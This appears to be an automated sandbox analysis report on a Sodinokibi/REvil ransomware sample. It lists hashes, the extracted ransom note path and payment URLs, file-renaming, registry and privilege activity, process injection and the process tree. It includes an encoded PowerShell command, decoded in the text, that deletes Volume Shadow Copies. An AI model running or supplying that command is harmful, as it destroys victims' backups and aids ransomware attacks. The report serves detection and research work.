Analysis
max time kernel: 141s
max time network: 114s
platform: windows7_x64
resource: win7v200722
submitted: 20-08-2020 13:02
Static task: static1
Behavioral task: behavioral1
  Sample: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
  Resource: win7v200722
Behavioral task: behavioral2
  Sample: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
  Resource: win10
General
Target: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll
Size: 116KB
MD5: f9d060c4e1ef8bcda341ea2f490af006
SHA1: 549f4014aec9e52cd8a4a1b304561c00278063a3
SHA256: 09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499
SHA512: 57dacb3a98f429492381aaf2693ea4fc399d948c0a7dc6a9b3a45eed8474f3f0c8d84964834fd3f44f74b320d24a505b4255555f68c115ff553559493942fd87
Malware Config
Extracted
C:\j919vw3-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D492A3C5F9F24AC9
http://decryptor.cc/D492A3C5F9F24AC9
Signatures
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 138 IoCs
Processes: rundll32.exe (pid 996)
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes: rundll32.exe
  description   ioc                                                                                              process
  File renamed  C:\Users\Admin\Pictures\LockBackup.raw => \??\c:\users\admin\pictures\LockBackup.raw.j919vw3    rundll32.exe
  File renamed  C:\Users\Admin\Pictures\JoinDebug.crw => \??\c:\users\admin\pictures\JoinDebug.crw.j919vw3      rundll32.exe
-
Enumerates connected drives 3 TTPs
-
Drops file in System32 directory 1 IoCs
Processes: rundll32.exe
  description                   ioc                                      process
  File opened for modification  C:\Windows\System32\CatRoot2\dberr.txt   rundll32.exe
-
Modifies service 2 TTPs 5 IoCs
Processes: vssvc.exe
  description  ioc                                                                                                              process
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer                                        vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                                               vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer                          vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                                          vssvc.exe
  Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}        vssvc.exe
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes: rundll32.exe
  description      ioc                                                                                                                                                      process
  Set value (str)  \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\050l3.bmp"     rundll32.exe
-
Drops file in Program Files directory 28 IoCs
Processes: rundll32.exe
-
Modifies system certificate store
Processes: rundll32.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes: rundll32.exe, powershell.exe
  pid   process
  996   rundll32.exe
  1020  powershell.exe
  1020  powershell.exe
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes: rundll32.exe, powershell.exe, vssvc.exe
  description                      pid   process
  Token: SeDebugPrivilege          996   rundll32.exe
  Token: SeDebugPrivilege          1020  powershell.exe
  Token: SeBackupPrivilege         1904  vssvc.exe
  Token: SeRestorePrivilege        1904  vssvc.exe
  Token: SeAuditPrivilege          1904  vssvc.exe
  Token: SeTakeOwnershipPrivilege  996   rundll32.exe
-
Suspicious use of WriteProcessMemory 11 IoCs
Processes: rundll32.exe, rundll32.exe
  description                      pid   process       target process
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 1000 wrote to memory of 996  1000  rundll32.exe  rundll32.exe
  PID 996 wrote to memory of 1020  996   rundll32.exe  powershell.exe
  PID 996 wrote to memory of 1020  996   rundll32.exe  powershell.exe
  PID 996 wrote to memory of 1020  996   rundll32.exe  powershell.exe
  PID 996 wrote to memory of 1020  996   rundll32.exe  powershell.exe
Processes
C:\Windows\system32\rundll32.exe
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#1
  - Suspicious use of WriteProcessMemory
  PID: 1000
  C:\Windows\SysWOW64\rundll32.exe
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\09e20223d059891d4712c1fd14423ac5aee9177bcb5e4c7e2d8778415f146499.bin.exe.dll,#1
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID: 996
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. shadow copy deletion, which accounts for the vssvc.exe activity below)
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1020
C:\Windows\system32\wbem\unsecapp.exe
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding
  PID: 1656
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 1904